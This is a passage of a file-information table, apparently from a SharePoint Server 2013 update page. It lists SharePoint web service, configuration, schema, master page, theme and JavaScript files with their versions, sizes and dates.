\nxlsrv.spsec.dll| microsoft.sharepoint.security.dll| 15.0.4420.1017| 16512| | \nsppimps.xml| sharepointpermission.impersonate.xml| | 207| 15-Sep-20| 11:36 \nsppom.xml| sharepointpermission.objectmodel.xml| | 207| 15-Sep-20| 11:36 \nsppusog.xml| sharepointpermission.unsafesaveonget.xml| | 211| 15-Sep-20| 11:36 \nwssmedtr.cfg| wss_mediumtrust.config| | 13782| 15-Sep-20| 11:36 \nwssmintr.cfg| wss_minimaltrust.config| | 9149| 15-Sep-20| 11:36 \nusercode.cfg| wss_usercode.config| | 5855| 15-Sep-20| 11:36 \nsub.amx| alerts.asmx| | 88| 15-Sep-20| 11:36 \nsubdisco.asx| alertsdisco.aspx| | 1313| 15-Sep-20| 11:36 \nsubwsdl.asx| alertswsdl.aspx| | 8824| 15-Sep-20| 11:36 \nauth.amx| authentication.asmx| | 96| 15-Sep-20| 11:36 \nautdisco.asx| authenticationdisco.aspx| | 1301| 15-Sep-20| 11:36 \nautwsdl.asx| authenticationwsdl.aspx| | 5968| 15-Sep-20| 11:36 \nbdcadminservice.svc| bdcadminservice.svc| | 332| 15-Sep-20| 11:36 \nbdcexecutionservice.svc| bdcremoteexecutionservice.svc| | 197| 15-Sep-20| 11:36 \nbdcresolverpickerservice.svc| bdcresolverpickerservice.svc| | 402| 15-Sep-20| 11:36 \ncellstorage.https.svc| cellstorage.https.svc| | 205| 15-Sep-20| 11:36 \ncellstorage.svc| cellstorage.svc| | 200| 15-Sep-20| 11:36 \ncopy.amx| copy.asmx| | 86| 15-Sep-20| 11:36 \ncopdisco.asx| copydisco.aspx| | 1281| 15-Sep-20| 11:36 \ncopwsdl.asx| copywsdl.aspx| | 11267| 15-Sep-20| 11:36 \ndiagnostics.amx| diagnostics.asmx| | 103| 15-Sep-20| 11:36 \ndiagdata.svc| diagnosticsdata.svc| | 391| 15-Sep-20| 11:36 \ndiagnosticsdisco.asx| diagnosticsdisco.aspx| | 1329| 15-Sep-20| 11:36 \ndiagnosticswsdl.asx| diagnosticswsdl.aspx| | 4677| 15-Sep-20| 11:36 \ndocumentsharing.svc| documentsharing.svc| | 331| 15-Sep-20| 11:36 \ndspsts.amx| dspsts.asmx| | 179| 15-Sep-20| 11:36 \ndspstsdi.asx_0001| dspstsdisco.aspx| | 1289| 15-Sep-20| 11:36 \ndspstsws.asx_0001| dspstswsdl.aspx| | 10966| 15-Sep-20| 11:36 \ndws.amx| dws.asmx| | 85| 15-Sep-20| 11:36 \ndwsdisco.asx| dwsdisco.aspx| | 1287| 15-Sep-20| 11:36 \ndwswsdl.asx| dwswsdl.aspx| | 20223| 15-Sep-20| 11:36 \nexcelrest.asx| excelrest.aspx| | 202| 15-Sep-20| 11:36 \nexportwp.asx| exportwp.aspx| | 498| 15-Sep-20| 11:36 \nexpurlwp.asx| expurlwp.aspx| | 243| 15-Sep-20| 11:36 \nforms.amx| forms.asmx| | 87| 15-Sep-20| 11:36 \nfordisco.asx| formsdisco.aspx| | 1283| 15-Sep-20| 11:36 \nforwsdl.asx| formswsdl.aspx| | 5644| 15-Sep-20| 11:36 \nimaging.amx| imaging.asmx| | 89| 15-Sep-20| 11:36 \nimadisco.asx| imagingdisco.aspx| | 1295| 15-Sep-20| 11:36 \nimawsdl.asx| imagingwsdl.aspx| | 24227| 15-Sep-20| 11:36 \nlistdata.svc| listdata.svc| | 392| 15-Sep-20| 11:36 \nlists.amx| lists.asmx| | 87| 15-Sep-20| 11:36 \nlisdisco.asx| listsdisco.aspx| | 1283| 15-Sep-20| 11:36 \nliswsdl.asx| listswsdl.aspx| | 73094| 15-Sep-20| 11:36 \nmeetings.amx| meetings.asmx| | 90| 15-Sep-20| 11:36 \nmeedisco.asx| meetingsdisco.aspx| | 1307| 15-Sep-20| 11:36 \nmeewsdl.asx| meetingswsdl.aspx| | 26921| 15-Sep-20| 11:36 \nonenote.ashx| onenote.ashx| | 89| 15-Sep-20| 11:36 \npeople.amx| people.asmx| | 88| 15-Sep-20| 11:36 \nppldisco.asx| peopledisco.aspx| | 1285| 15-Sep-20| 11:36 \npplwsdl.asx| peoplewsdl.aspx| | 9093| 15-Sep-20| 11:36 \nperms.amx| permissions.asmx| | 94| 15-Sep-20| 11:36 \nperdisco.asx| permissionsdisco.aspx| | 1315| 15-Sep-20| 11:36 \nperwsdl.asx| permissionswsdl.aspx| | 13698| 15-Sep-20| 11:36 \nsharedaccess.amx| sharedaccess.asmx| | 94| 15-Sep-20| 11:36 \nsharedaccessdisco.asx| sharedaccessdisco.aspx| | 1297| 15-Sep-20| 11:36 \nsharedaccesswsdl.asx| sharedaccesswsdl.aspx| | 4036| 15-Sep-20| 11:36 \nsharepointemailws.amx| sharepointemailws.asmx| | 98| 15-Sep-20| 11:36 \nsharepointemailwsdisco.asx| sharepointemailwsdisco.aspx| | 1349| 15-Sep-20| 11:36 \nsharepointemailwswsdl.asx| sharepointemailwswsdl.aspx| | 25799| 15-Sep-20| 11:36 \nsitedata.amx| sitedata.asmx| | 90| 15-Sep-20| 11:36 \nsdadisco.asx| sitedatadisco.aspx| | 1289| 15-Sep-20| 11:36 \nsdawsdl.asx| sitedatawsdl.aspx| | 36711| 15-Sep-20| 11:36 \nsites.amx| sites.asmx| | 87| 15-Sep-20| 11:36 \nsitdisco.asx| sitesdisco.aspx| | 1283| 15-Sep-20| 11:36 \nsitwsdl.asx| siteswsdl.aspx| | 22976| 15-Sep-20| 11:36 \nspclaimproviderwebservice.https.svc| spclaimproviderwebservice.https.svc| | 115| 15-Sep-20| 11:36 \nspclaimproviderwebservice.svc| spclaimproviderwebservice.svc| | 110| 15-Sep-20| 11:36 \nspdisco.asx| spdisco.aspx| | 11428| 15-Sep-20| 11:36 \nspsearchdisco.asx| spsearchdisco.aspx| | 1319| 15-Sep-20| 11:36 \nspsearchwsdl.asx| spsearchwsdl.aspx| | 8629| 15-Sep-20| 11:36 \nspsecuritytokenservice.svc| spsecuritytokenservice.svc| | 476| 15-Sep-20| 11:36 \nweb.config_sts| web.config| | 4845| 15-Sep-20| 11:36 \nusergrp.amx| usergroup.asmx| | 92| 15-Sep-20| 11:36 \nusedisco.asx| usergroupdisco.aspx| | 1311| 15-Sep-20| 11:36 \nusewsdl.asx| usergroupwsdl.aspx| | 82880| 15-Sep-20| 11:36 \nversions.amx| versions.asmx| | 90| 15-Sep-20| 11:36 \nverdisco.asx| versionsdisco.aspx| | 1289| 15-Sep-20| 11:36 \nverwsdl.asx| versionswsdl.aspx| | 9474| 15-Sep-20| 11:36 \nviews.amx| views.asmx| | 87| 15-Sep-20| 11:36 \nviedisco.asx| viewsdisco.aspx| | 1283| 15-Sep-20| 11:36 \nviewsdl.asx| viewswsdl.aspx| | 25520| 15-Sep-20| 11:36 \nweb.cfg_0010| web.config| | 13944| 15-Sep-20| 11:36 \nwppages.amx| webpartpages.asmx| | 186| 15-Sep-20| 11:36 \nwppdisco.asx| webpartpagesdisco.aspx| | 1315| 15-Sep-20| 11:36 \nwppwsdl.asx| webpartpageswsdl.aspx| | 56408| 15-Sep-20| 11:36 \nwebs.amx| webs.asmx| | 86| 15-Sep-20| 11:36 \nwebdisco.asx| websdisco.aspx| | 1281| 15-Sep-20| 11:36 \nwebwsdl.asx| webswsdl.aspx| | 41302| 15-Sep-20| 11:36 \nwopi.ashx| wopi.ashx| | 86| 15-Sep-20| 11:36 \nwsdisco.asx| wsdisco.aspx| | 1806| 15-Sep-20| 11:36 \nwswsdl.asx| wswsdl.aspx| | 1904| 15-Sep-20| 11:36 \nstssoap.dll| stssoap.dll| 15.0.5172.1000| 554088| 15-Sep-20| 11:36 \nsubsetproxy.dll_0001| microsoft.sharepoint.subsetproxy.dll| 15.0.5281.1000| 841616| 15-Sep-20| 11:36 \nsubsetshim.dll_0001| microsoft.sharepoint.dll| 15.900.5281.1000| 2133912| 15-Sep-20| 11:36 \nalerttmp.xml| alerttemplates.xml| | 458234| 15-Sep-20| 11:36 \nalerttms.xml| alerttemplates_sms.xml| | 51863| 15-Sep-20| 11:36 \ndefault.aspx_app| default.aspx| | 1168| 15-Sep-20| 11:36 \nonet.xml_app| onet.xml| | 4911| 15-Sep-20| 11:36 \ndefault.aspx_appcatalog| default.aspx| | 4026| 15-Sep-20| 11:36 \nonet.xml_appcatalog| onet.xml| | 6262| 15-Sep-20| 11:36 \napphostwebfeatures.xsd| apphostwebfeatures.xsd| | 17579| 15-Sep-20| 11:36 \nappmanifest.xsd| appmanifest.xsd| | 20392| 15-Sep-20| 11:36 \napppartconfig.xsd| apppartconfig.xsd| | 2826| 15-Sep-20| 11:36 \nappsolution.xsd| appsolution.xsd| | 101258| 15-Sep-20| 11:36 \nblog.xsl| blog.xsl| | 37369| 15-Sep-20| 11:36 \nonet.xml_blog| onet.xml| | 6549| 15-Sep-20| 11:36 \ncamlqry.xsd| camlquery.xsd| | 10890| 15-Sep-20| 11:36 \ncamlview.xsd| camlview.xsd| | 19014| 15-Sep-20| 11:36 \ncpchkers.xsd| capabilitycheckers.xsd| | 1924| 15-Sep-20| 11:36 \nschema.xml_0010| schema.xml| | 16975| 15-Sep-20| 11:36 \ndmslstallitems_aspx| allitems.aspx| | 2731| 15-Sep-20| 11:36 \ndmslstcreatedls_aspx| createdls.aspx| | 2731| 15-Sep-20| 11:36 \ndmslstdeletedls_aspx| deletedls.aspx| | 2731| 15-Sep-20| 11:36 \ndmslstdispform_aspx| dispform.aspx| | 4190| 15-Sep-20| 11:36 \ndmslsteditform_aspx| editform.aspx| | 4167| 15-Sep-20| 11:36 \ndmslstmodifydls_aspx| modifydls.aspx| | 2731| 15-Sep-20| 11:36 \ndmslstnewform_aspx| newform.aspx| | 4197| 15-Sep-20| 11:36 \ndmslstschema_xml| schema.xml| | 22840| 15-Sep-20| 11:36 \ntopology.dwp| topologyview.dwp| | 495| 15-Sep-20| 11:36 \nschema.xml_1221| schema.xml| | 9478| 15-Sep-20| 11:36 \nschema.xml_1220| schema.xml| | 7583| 15-Sep-20| 11:36 \napplications.asx_0014| applications.aspx| | 3724| 15-Sep-20| 11:36 \napps.asx_0014| apps.aspx| | 3708| 15-Sep-20| 11:36 \nbackups.asx_0014| backups.aspx| | 3714| 15-Sep-20| 11:36 \nconfigurationwizards.asx_0014| configurationwizards.aspx| | 3740| 15-Sep-20| 11:36 \ndefault.asx_0014| default.aspx| | 5454| 15-Sep-20| 11:36 \ngenappsettings.asx_0014| generalapplicationsettings.aspx| | 3753| 15-Sep-20| 11:36 \nmonitoring.asx_0014| monitoring.aspx| | 3720| 15-Sep-20| 11:36 \no365config.asx_0015| office365configuration.aspx| | 3838| 15-Sep-20| 11:36 \nsecurity.asx_0014| security.aspx| | 3716| 15-Sep-20| 11:36 \nsysset.asx_0014| systemsettings.aspx| | 3728| 15-Sep-20| 11:36 \nupgandmig.asx_0014| upgradeandmigration.aspx| | 3738| 15-Sep-20| 11:36 \nonet.xml_0006| onet.xml| | 10552| 15-Sep-20| 11:36 \ncoredefs.xsd| coredefinitions.xsd| | 3308| 15-Sep-20| 11:36 \ndeplset.xsd| deploymentexportsettings.xsd| | 4494| 15-Sep-20| 11:36 \ndepllook.xsd| deploymentlookuplistmap.xsd| | 1632| 15-Sep-20| 11:36 \ndepl.xsd| deploymentmanifest.xsd| | 79362| 15-Sep-20| 11:36 \ndeplreq.xsd| deploymentrequirements.xsd| | 1262| 15-Sep-20| 11:36 \ndeplroot.xsd| deploymentrootobjectmap.xsd| | 1642| 15-Sep-20| 11:36 \ndeplsys.xsd| deploymentsystemdata.xsd| | 3065| 15-Sep-20| 11:36 \ndepluser.xsd| deploymentusergroupmap.xsd| | 3386| 15-Sep-20| 11:36 \ndeplform.xsd| deploymentviewformslist.xsd| | 877| 15-Sep-20| 11:36 \ndip.css| dip.css| | 1781| 15-Sep-20| 11:36 \ndip.css_14| dip.css| | 1781| 15-Sep-20| 11:36 \ndip.html| dip.html| | 4328| 15-Sep-20| 11:36 \ndip.html_14| dip.html| | 4328| 15-Sep-20| 11:36 \ndip.js| dip.js| | 63039| 15-Sep-20| 11:36 \ndip.js_14| dip.js| | 63039| 15-Sep-20| 11:36 \nmessagebanner.js| messagebanner.js| | 4968| 15-Sep-20| 11:36 \nmessagebanner.js_14| messagebanner.js| | 4968| 15-Sep-20| 11:36 \ndocicon.xml| docicon.xml| | 16363| 15-Sep-20| 11:36 \nwkpstd.asx_wiki| wkpstd.aspx| | 3356| 15-Sep-20| 11:36 \nfldtypes.xml| fldtypes.xml| | 256018| 15-Sep-20| 11:36 \nfldtypes.xsl| fldtypes.xsl| | 133256| 15-Sep-20| 11:36 \nftacpl.xml| fldtypes_accessrequestspermissionlevel.xml| | 753| 15-Sep-20| 11:36 \nfluidapp.xsd| fluidapplicationsettings.xsd| | 2721| 15-Sep-20| 11:36 \nformxml.xsl| formxml.xsl| | 20914| 15-Sep-20| 11:36 \ngbwdef.asc| gbwdefaulttemplates.ascx| | 57071| 15-Sep-20| 11:36 \ngbwmdef.asc| gbwmobiledefaulttemplates.ascx| | 13722| 15-Sep-20| 11:36 \ndispsr.asx_mobile| dispsr.aspx| | 2702| 15-Sep-20| 11:36 \neditsr.asx_mobile| editsr.aspx| | 2574| 15-Sep-20| 11:36 \nnewsr.asx_mobile| newsr.aspx| | 2570| 15-Sep-20| 11:36 \nviewdaily.asx_mobile| viewdaily.aspx| | 4994| 15-Sep-20| 11:36 \nwaview.asx_mobile| waview.aspx| | 2986| 15-Sep-20| 11:36 \ndefault.aspx_gbw| default.aspx| | 3458| 15-Sep-20| 11:36 \nonet.xml_gbw| onet.xml| | 10911| 15-Sep-20| 11:36 \nschema.xml_appdatalib| schema.xml| | 314| 15-Sep-20| 11:36 \ndefault.spc| default.spcolor| | 5243| 15-Sep-20| 11:36 \npalette001.spcolor| palette001.spcolor| | 5243| 15-Sep-20| 11:36 \npalette002.spcolor| palette002.spcolor| | 5251| 15-Sep-20| 11:36 \npalette003.spcolor| palette003.spcolor| | 5247| 15-Sep-20| 11:36 \npalette004.spcolor| palette004.spcolor| | 5246| 15-Sep-20| 11:36 \npalette005.spcolor| palette005.spcolor| | 5247| 15-Sep-20| 11:36 \npalette006.spcolor| palette006.spcolor| | 5249| 15-Sep-20| 11:36 \npalette007.spcolor| palette007.spcolor| | 5251| 15-Sep-20| 11:36 \npalette008.spcolor| palette008.spcolor| | 5251| 15-Sep-20| 11:36 \npalette009.spcolor| palette009.spcolor| | 5248| 15-Sep-20| 11:36 \npalette010.spcolor| palette010.spcolor| | 5250| 15-Sep-20| 11:36 \npalette011.spcolor| palette011.spcolor| | 5248| 15-Sep-20| 11:36 \npalette012.spcolor| palette012.spcolor| | 5243| 15-Sep-20| 11:36 \npalette013.spcolor| palette013.spcolor| | 5243| 15-Sep-20| 11:36 \npalette014.spcolor| palette014.spcolor| | 5243| 15-Sep-20| 11:36 \npalette015.spcolor| palette015.spcolor| | 5243| 15-Sep-20| 11:36 \npalette016.spcolor| palette016.spcolor| | 5243| 15-Sep-20| 11:36 \npalette017.spcolor| palette017.spcolor| | 5243| 15-Sep-20| 11:36 \npalette018.spcolor| palette018.spcolor| | 5243| 15-Sep-20| 11:36 \npalette019.spcolor| palette019.spcolor| | 5243| 15-Sep-20| 11:36 \npalette020.spcolor| palette020.spcolor| | 5243| 15-Sep-20| 11:36 \npalette021.spcolor| palette021.spcolor| | 5243| 15-Sep-20| 11:36 \npalette022.spcolor| palette022.spcolor| | 5246| 15-Sep-20| 11:36 \npalette023.spcolor| palette023.spcolor| | 5246| 15-Sep-20| 11:36 \npalette024.spcolor| palette024.spcolor| | 5246| 15-Sep-20| 11:36 \npalette025.spcolor| palette025.spcolor| | 5246| 15-Sep-20| 11:36 \npalette026.spcolor| palette026.spcolor| | 5246| 15-Sep-20| 11:36 \npalette027.spcolor| palette027.spcolor| | 5246| 15-Sep-20| 11:36 \npalette028.spcolor| palette028.spcolor| | 5246| 15-Sep-20| 11:36 \npalette029.spcolor| palette029.spcolor| | 5246| 15-Sep-20| 11:36 \npalette030.spcolor| palette030.spcolor| | 5246| 15-Sep-20| 11:36 \npalette031.spcolor| palette031.spcolor| | 5246| 15-Sep-20| 11:36 \npalette032.spcolor| palette032.spcolor| | 5245| 15-Sep-20| 11:36 \npalette1.spcolor| palette1.spcolor| | 3110| 15-Sep-20| 11:36 \npalette2.spcolor| palette2.spcolor| | 3121| 15-Sep-20| 11:36 \npalette3.spcolor| palette3.spcolor| | 3122| 15-Sep-20| 11:36 \npalette4.spcolor| palette4.spcolor| | 3121| 15-Sep-20| 11:36 \npalette5.spcolor| palette5.spcolor| | 3116| 15-Sep-20| 11:36 \npalette6.spcolor| palette6.spcolor| | 3118| 15-Sep-20| 11:36 \nschema.xml_designlib| schema.xml| | 4033| 15-Sep-20| 11:36 \nfnt001.spfont| fontscheme001.spfont| | 15354| 15-Sep-20| 11:36 \nfnt002.spfont| fontscheme002.spfont| | 13545| 15-Sep-20| 11:36 \nfnt003.spfont| fontscheme003.spfont| | 15461| 15-Sep-20| 11:36 \nfnt004.spfont| fontscheme004.spfont| | 15884| 15-Sep-20| 11:36 \nfnt005.spfont| fontscheme005.spfont| | 16065| 15-Sep-20| 11:36 \nfnt006.spfont| fontscheme006.spfont| | 14209| 15-Sep-20| 11:36 \nfnt007.spfont| fontscheme007.spfont| | 15880| 15-Sep-20| 11:36 \ndefault.spf| default.spfont| | 13976| 15-Sep-20| 11:36 \nsharepoint.spfont| sharepointpersonality.spfont| | 13976| 15-Sep-20| 11:36 \nschema.xml_listtemp| schema.xml| | 80036| 15-Sep-20| 11:36 \nupload.asx_listtemp| upload.aspx| | 6141| 15-Sep-20| 11:36 \napp.mas_mplib| app.master| | 19062| 15-Sep-20| 11:36 \ndefault.mas| default.master| | 26292| 15-Sep-20| 11:36 \ndefault.mas_mplib| default.master| | 26292| 15-Sep-20| 11:36 \nlv3.mas| layoutsv3.master| | 13587| 15-Sep-20| 11:36 \nminimal.mas| minimal.master| | 8825| 15-Sep-20| 11:36 \nminimal.mas_mplib| minimal.master| | 8825| 15-Sep-20| 11:36 \nmwsdef.mas_mplib| mwsdefault.master| | 26950| 15-Sep-20| 11:36 \nmwsv15.mas_mplib| mwsdefaultv15.master| | 30580| 15-Sep-20| 11:36 \nmwsv4.mas_mplib| mwsdefaultv4.master| | 27509| 15-Sep-20| 11:36 \noslo.mas_mplib| oslo.master| | 29416| 15-Sep-20| 11:36 \noslo.prev| oslo.preview| | 10159| 15-Sep-20| 11:36 \nschema.xml_mplib| schema.xml| | 84417| 15-Sep-20| 11:36 \nseattle.mas| seattle.master| | 29925| 15-Sep-20| 11:36 \nseattle.mas_mplib| seattle.master| | 29925| 15-Sep-20| 11:36 \nseattle.prev| seattle.preview| | 10725| 15-Sep-20| 11:36 \nupload.asp_mplib| upload.aspx| | 5911| 15-Sep-20| 11:36 \nv4.mas| v4.master| | 26916| 15-Sep-20| 11:36 \nv4.mas_mplib| v4.master| | 26916| 15-Sep-20| 11:36 \nactivate.asx_solutionslib| activate.aspx| | 3861| 15-Sep-20| 11:36 \nschema.xml_solutionslib| schema.xml| | 83463| 15-Sep-20| 11:36 \nupload.asx_solutionslib| upload.aspx| | 5914| 15-Sep-20| 11:36 \nviewpage.asx_solutionslib| viewpage.aspx| | 2718| 15-Sep-20| 11:36 \nschema.xml_themeslib| schema.xml| | 1849| 15-Sep-20| 11:36 \nschema.xml_users| schema.xml| | 392079| 15-Sep-20| 11:36 \neditdlg.htm_webtemp| editdlg.htm| | 4892| 15-Sep-20| 11:36 \nschema.xml_webtemp| schema.xml| | 166908| 15-Sep-20| 11:36 \nupload.asx_webtemp| upload.aspx| | 6141| 15-Sep-20| 11:36 \nschema.xml_wplib| schema.xml| | 92345| 15-Sep-20| 11:36 \nupload.asx_wplib| upload.aspx| | 5914| 15-Sep-20| 11:36 \ncmdui.xml_global| cmdui.xml| | 631119| 15-Sep-20| 11:36 \nonet.xml_global| onet.xml| | 313439| 15-Sep-20| 11:36 \nstdview.xml_global| stdview.xml| | 54852| 15-Sep-20| 11:36 \nvwstyles.xml_global| vwstyles.xml| | 422824| 15-Sep-20| 11:36 \ngroupbd.xsl| groupboard.xsl| | 14233| 15-Sep-20| 11:36 \nhtrinfo.xml_0001| htmltransinfo.xml| | 5136| 15-Sep-20| 11:36 \ndefault.asx_forms| default.aspx| | 2788| 15-Sep-20| 11:36 \nweb.cfg_forms| web.config| | 216| 15-Sep-20| 11:36 \ndefault.asx_multilogin| default.aspx| | 2284| 15-Sep-20| 11:36 \nweb.cfg_multilogin| web.config| | 216| 15-Sep-20| 11:36 \ndefault.asx_trust| default.aspx| | 530| 15-Sep-20| 11:36 \nweb.cfg_trust| web.config| | 2190| 15-Sep-20| 11:36 \ndefault.asx_windows| default.aspx| | 522| 15-Sep-20| 11:36 \nweb.cfg_windows| web.config| | 214| 15-Sep-20| 11:36 \ninternal.xsl| internal.xsl| | 11158| 15-Sep-20| 11:36 \naccreqctl.debug.js| accessrequestscontrol.debug.js| | 18870| 15-Sep-20| 11:36 \naccreqctl.js| accessrequestscontrol.js| | 10674| 15-Sep-20| 11:36 \naccreqctl.xml| accessrequestscontrol.xml| | 103| 15-Sep-20| 11:36 \naccreqviewtmpl.debug.js| accessrequestsviewtemplate.debug.js| | 28650| 15-Sep-20| 11:36 \naccreqviewtmpl.js| accessrequestsviewtemplate.js| | 11376| 15-Sep-20| 11:36 \naccreqviewtmpl.xml| accessrequestsviewtemplate.xml| | 108| 15-Sep-20| 11:36 \nappcatalogfieldtemplate.debug.js| appcatalogfieldtemplate.debug.js| | 9040| 15-Sep-20| 11:36 \nappcatalogfieldtemplate.js| appcatalogfieldtemplate.js| | 3342| 15-Sep-20| 11:36 \nappdeveloperdash.debug.js| appdeveloperdash.debug.js| | 22542| 15-Sep-20| 11:36 \nappdeveloperdash.js| appdeveloperdash.js| | 11197| 15-Sep-20| 11:36 \naddb.xml| appdeveloperdash.xml| | 158| 15-Sep-20| 11:36 \nautofill.debug.js| autofill.debug.js| | 18404| 15-Sep-20| 11:36 \nautofill.js| autofill.js| | 10322| 15-Sep-20| 11:36 \nautohostedlicensingtemplates.debug.js| autohostedlicensingtemplates.debug.js| | 20576| 15-Sep-20| 11:36 \nautohostedlicensingtemplates.js| autohostedlicensingtemplates.js| | 8623| 15-Sep-20| 11:36 \nautohostedlicensingtemplates.xml| autohostedlicensingtemplates.xml| | 110| 15-Sep-20| 11:36 \nbform.debug.js| bform.debug.js| | 459758| 15-Sep-20| 11:36 \nbform.js| bform.js| | 258656| 15-Sep-20| 11:36 \nbform.xml| bform.xml| | 87| 15-Sep-20| 11:36 \nblank.debug.js| blank.debug.js| | 164| 15-Sep-20| 11:36 \nblank.js| blank.js| | 119| 15-Sep-20| 11:36 \ncallout.debug.js| callout.debug.js| | 84762| 15-Sep-20| 11:36 \ncallout.js| callout.js| | 26526| 15-Sep-20| 11:36 \ncallout.xml| callout.xml| | 155| 15-Sep-20| 11:36 \nchoicebuttonfieldtemplate.debug.js| choicebuttonfieldtemplate.debug.js| | 5782| 15-Sep-20| 11:36 \nchoicebuttonfieldtemplate.js| choicebuttonfieldtemplate.js| | 2388| 15-Sep-20| 11:36 \ncbft.xml| choicebuttonfieldtemplate.xml| | 97| 15-Sep-20| 11:36 \nclientforms.debug.js| clientforms.debug.js| | 153736| 15-Sep-20| 11:36 \nclientforms.js| clientforms.js| | 77613| 15-Sep-20| 11:36 \nclientforms.xml| clientforms.xml| | 145| 15-Sep-20| 11:36 \nclientpeoplepicker.debug.js| clientpeoplepicker.debug.js| | 77565| 15-Sep-20| 11:36 \nclientpeoplepicker.js| clientpeoplepicker.js| | 41210| 15-Sep-20| 11:36 \nclientrenderer.debug.js| clientrenderer.debug.js| | 23510| 15-Sep-20| 11:36 \nclientrenderer.js| clientrenderer.js| | 9805| 15-Sep-20| 11:36 \nclienttemplates.debug.js| clienttemplates.debug.js| | 294399| 15-Sep-20| 11:36 \nclienttemplates.js| clienttemplates.js| | 150440| 15-Sep-20| 11:36 \nclienttemplates.xml| clienttemplates.xml| | 101| 15-Sep-20| 11:36 \ncommonvalidation.debug.js| commonvalidation.debug.js| | 5376| 15-Sep-20| 11:36 \ncomval.js| commonvalidation.js| | 3369| 15-Sep-20| 11:36 \ncommonvalidation.xml| commonvalidation.xml| | 98| 15-Sep-20| 11:36 \ncore.debug.js| core.debug.js| | 636512| 15-Sep-20| 11:36 \ncore.js_0001| core.js| | 331719| 15-Sep-20| 11:36 \ncore.xml| core.xml| | 86| 15-Sep-20| 11:36 \ndatepicker.debug.js| datepicker.debug.js| | 48715| 15-Sep-20| 11:36 \ndatepick.js| datepicker.js| | 27099| 15-Sep-20| 11:36 \ndatepicker.xml| datepicker.xml| | 92| 15-Sep-20| 11:36 \ndesigngallery.debug.js| designgallery.debug.js| | 46223| 15-Sep-20| 11:36 \ndesigngallery.js| designgallery.js| | 28550| 15-Sep-20| 11:36 \ndesigngallery.xml| designgallery.xml| | 95| 15-Sep-20| 11:36 \ndevdash.debug.js| devdash.debug.js| | 86004| 15-Sep-20| 11:36 \ndevdash.js| devdash.js| | 36366| 15-Sep-20| 11:36 \ndragdrop.debug.js| dragdrop.debug.js| | 160299| 15-Sep-20| 11:36 \ndragdrop.js| dragdrop.js| | 85346| 15-Sep-20| 11:36 \ndragdrop.xml| dragdrop.xml| | 90| 15-Sep-20| 11:36 \nentityeditor.debug.js| entityeditor.debug.js| | 73212| 15-Sep-20| 11:36 \nentityeditor.js| entityeditor.js| | 38537| 15-Sep-20| 11:36 \nfilepreview.debug.js| filepreview.debug.js| | 18731| 15-Sep-20| 11:36 \nfilepreview.js| filepreview.js| | 10123| 15-Sep-20| 11:36 \nfilepreview.xml| filepreview.xml| | 91| 15-Sep-20| 11:36 \nfoldhyperlink.debug.js| foldhyperlink.debug.js| | 3360| 15-Sep-20| 11:36 \nfoldhyperlink.js| foldhyperlink.js| | 1544| 15-Sep-20| 11:36 \nform.debug.js| form.debug.js| | 240967| 15-Sep-20| 11:36 \nform.js| form.js| | 128992| 15-Sep-20| 11:36 \nform.xml| form.xml| | 86| 15-Sep-20| 11:36 \nganttscript.debug.js| ganttscript.debug.js| | 8826| 15-Sep-20| 11:36 \nganttscr.js| ganttscript.js| | 4787| 15-Sep-20| 11:36 \ngeolocationfieldtemplate.debug.js| geolocationfieldtemplate.debug.js| | 40200| 15-Sep-20| 11:36 \ngeolocationfieldtemplate.js| geolocationfieldtemplate.js| | 14901| 15-Sep-20| 11:36 \nglft.xml| geolocationfieldtemplate.xml| | 88| 15-Sep-20| 11:36 \ngroupboard.debug.js| groupboard.debug.js| | 15630| 15-Sep-20| 11:36 \ngroupboard.js| groupboard.js| | 9088| 15-Sep-20| 11:36 \ngroupboard.xml| groupboard.xml| | 92| 15-Sep-20| 11:36 \ngroupeditempicker.debug.js| groupeditempicker.debug.js| | 20302| 15-Sep-20| 11:36 \ngip.js| groupeditempicker.js| | 11630| 15-Sep-20| 11:36 \nhierarchytaskslist.debug.js| hierarchytaskslist.debug.js| | 59315| 15-Sep-20| 11:36 \nhierarchytaskslist.js| hierarchytaskslist.js| | 19494| 15-Sep-20| 11:36 \nhierarchytaskslist.xml| hierarchytaskslist.xml| | 57| 15-Sep-20| 11:36 \nimglib.debug.js| imglib.debug.js| | 85024| 15-Sep-20| 11:36 \nimglib.js| imglib.js| | 50445| 15-Sep-20| 11:36 \nimglib.xml| imglib.xml| | 88| 15-Sep-20| 11:36 \ninit.debug.js| init.debug.js| | 304096| 15-Sep-20| 11:36 \ninit.js_0001| init.js| | 161957| 15-Sep-20| 11:36 \ninplview.debug.js| inplview.debug.js| | 136957| 15-Sep-20| 11:36 \ninplview.js| inplview.js| | 69236| 15-Sep-20| 11:36 \ninplview.xml| inplview.xml| | 158| 15-Sep-20| 11:36 \njsgrid.debug.js| jsgrid.debug.js| | 1164592| 15-Sep-20| 11:36 \njsgrid.gantt.debug.js| jsgrid.gantt.debug.js| | 109470| 15-Sep-20| 11:36 \njsgrid.gantt.js| jsgrid.gantt.js| | 41962| 15-Sep-20| 11:36 \njsgrid.gantt.xml| jsgrid.gantt.xml| | 84| 15-Sep-20| 11:36 \njsgrid.js| jsgrid.js| | 436852| 15-Sep-20| 11:36 \njsgrid.xml| jsgrid.xml| | 60| 15-Sep-20| 11:36 \nlanguagepickercontrol.js| languagepickercontrol.js| | 11175| 15-Sep-20| 11:36 \nmapviewtemplate.debug.js| mapviewtemplate.debug.js| | 37816| 15-Sep-20| 11:36 \nmapviewtemplate.js| mapviewtemplate.js| | 15210| 15-Sep-20| 11:36 \nmapvt.xml| mapviewtemplate.xml| | 106| 15-Sep-20| 11:36 \nmenu.debug.js| menu.debug.js| | 101574| 15-Sep-20| 11:36 \nmenu.htc| menu.htc| | 21872| 15-Sep-20| 11:36 \nmenu.js_0001| menu.js| | 51332| 15-Sep-20| 11:36 \nmenubar.htc| menubar.htc| | 13961| 15-Sep-20| 11:36 \nmquery.debug.js| mquery.debug.js| | 59856| 15-Sep-20| 11:36 \nmquery.js| mquery.js| | 22239| 15-Sep-20| 11:36 \nmquery.xml| mquery.xml| | 89| 15-Sep-20| 11:36 \noffline.debug.js| offline.debug.js| | 7585| 15-Sep-20| 11:36 \noffline.js| offline.js| | 3595| 15-Sep-20| 11:36 \nows.debug.js| ows.debug.js| | 511037| 15-Sep-20| 11:36 \nows.js| ows.js| | 265328| 15-Sep-20| 11:36 \nows.xml| ows.xml| | 85| 15-Sep-20| 11:36 \nowsbrows.debug.js| owsbrows.debug.js| | 9579| 15-Sep-20| 11:36 \nowsbrows.js| owsbrows.js| | 6113| 15-Sep-20| 11:36 \npickerhierarchycontrol.js| pickerhierarchycontrol.js| | 85910| 15-Sep-20| 11:36 